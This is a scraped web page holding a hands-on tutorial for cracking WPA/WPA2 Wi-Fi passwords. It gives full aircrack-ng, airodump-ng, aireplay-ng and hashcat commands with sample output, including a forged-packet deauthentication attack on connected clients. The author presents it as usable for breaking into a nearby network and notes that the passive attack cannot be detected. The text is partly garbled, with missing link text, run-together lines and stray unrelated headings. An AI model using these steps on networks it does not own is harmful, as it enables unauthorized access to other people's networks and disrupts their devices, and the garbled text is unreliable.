Crack Wpa2 Beini Wifi
Wi-Fi CrackingCrack WPA/WPA2 Wi-Fi Routers with Airodump-ng and /.This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the.If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at. For a variety of suggestions and alternative methods, see the.
And have also graciously provided translations to and the in Chinese if you prefer those versions.DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use.
Don't be a dick. Getting StartedThis tutorial assumes that you:. Have a general comfortability using the command-line. Are running a debian-based linux distro, preferably (OSX users see the ). Have installed. sudo apt-get install aircrack-ng.
Have a wireless card that supports (see for a list of supported devices)Cracking a Wi-Fi Network Monitor ModeBegin by listing wireless interfaces that support monitor mode with. Airodump-ng mon0You should see output similar to what is below. CH 13 Elapsed: 52 s 2017-07-23 15:49BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e814:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH278:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D29C:34:26:9F:2E:E8 -85 40 0 0 1 54e.
WPA2 CCMP PSK Comcast2EEA-EXTBC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK rootEC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dcaFor the purposes of this demo, we will choose to crack the password of my network, 'hackme'. Remember the BSSID MAC address and channel ( CH) number as displayed by airodump-ng, as we will need them both for the next step. Capture a 4-way HandshakeWPA/WPA2 uses a to authenticate devices to the network.
You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command. # replace -c and -bssid values with the values of your target network # -w specifies the directory where we will save the packet captureairodump-ng -c 3 -bssid 9C:5C:8E:C9:AB:C0 -w.
Beini 1.2.5 Tutorial
Mon0 CH 6 Elapsed: 1 min 2017-07-23 16:09 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUSNow we wait. Once you've captured a handshake, you should see something like WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the below for info on this.Once you've captured a handshake, press ctrl-c to quit airodump-ng.
You should see a.cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack. Mv./-01.cap hackme.cap Crack the Network PasswordThe final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like.
You can also try your hand at CPU cracking with Aircrack-ng.Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the dictionary files. Cracking With naive-hashcat (recommended)Before we can crack the password using naive-hashcat, we need to convert our.cap file to the equivalent hashcat file format.hccapx.
You can do this easily by either uploading the.cap file to or using the tool directly. # downloadgit clone naive-hashcat# download the 134MB rockyou dictionary filecurl -L -o dicts/rockyou.txt crack! # 2500 is the hashcat hash mode for WPA/WPA2HASHFILE=hackme.hccapx POTFILE=hackme.pot HASHTYPE=2500./naive-hashcat.shNaive-hashcat uses various, and (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POTFILE: e30a5a57fc00211fc9fcc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanetWhere the last two fields separated by: are the network name and password respectively.If you would like to use hashcat without naive-hashcat see for info. Cracking With Aircrack-ngAircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist.
I recommend using the infamous rockyou dictionary file. # -a2 specifies WPA2, -b is the BSSID, -w is the wordfileaircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.capIf the password is cracked you will see a KEY FOUND! Message in the terminal followed by the plain text version of the network password. Aircrack-ng 1.2 beta300:01:49 111040 keys tested (1017.96 k/s)KEY FOUND!
hacktheplanet Master Key: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 8959 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2ETransient Key: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 712F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 736F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 788D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4Deauth AttackA deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake 'sender' addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.Use airodump-ng to monitor a specific access point (using -c channel -bssid MAC) until you see a client ( STATION) connected.
A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC. CH 6 Elapsed: 2 mins 2017-07-23 19:15 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID9C:5C:8E:C9:AB:C0 - 144 10 6 54e WPA2 CCMP PSK ASUSBSSID STATION PWR Rate Lost Frames Probe9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUSNow, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process. # put your network device into monitor modeairmon-ng start wlan0# listen for all nearby beacon frames to get target BSSID and channelairodump-ng mon0# start listening for the handshakeairodump-ng -c 6 -bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0# optionally deauth a connected client to force a handshakeaireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0########## crack password with aircrack-ng. ########## # download 134MB rockyou.txt dictionary file if neededcurl -L -o rockyou.txt crack w/ aircrack-ngaircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap########## or crack password with naive-hashcat ########## # convert cap to hccapxcap2hccapx.bin capture/-01.cap capture/-01.hccapx# crack with naive-hashcatHASHFILE=hackme.hccapx POTFILE=hackme.pot HASHTYPE=2500./naive-hashcat.sh AppendixThe response to this tutorial was so great that I've added suggestions and additional material from community members as an.
Check it out to learn how to:. Capture handshakes and crack WPA passwords on MacOS/OSX. Capture handshakes from every network around you with wlandump-ng. Use crunch to generate 100+GB wordlists on-the-fly. Spoof your MAC address with macchangerA of the appendix is also available. AttributionMuch of the information presented here was gleaned from. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.Overwhelming thanks to and for translating this tutorial into.
Further shout outs to, and who also provided suggestions and typo fixes on and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on Hacker News post.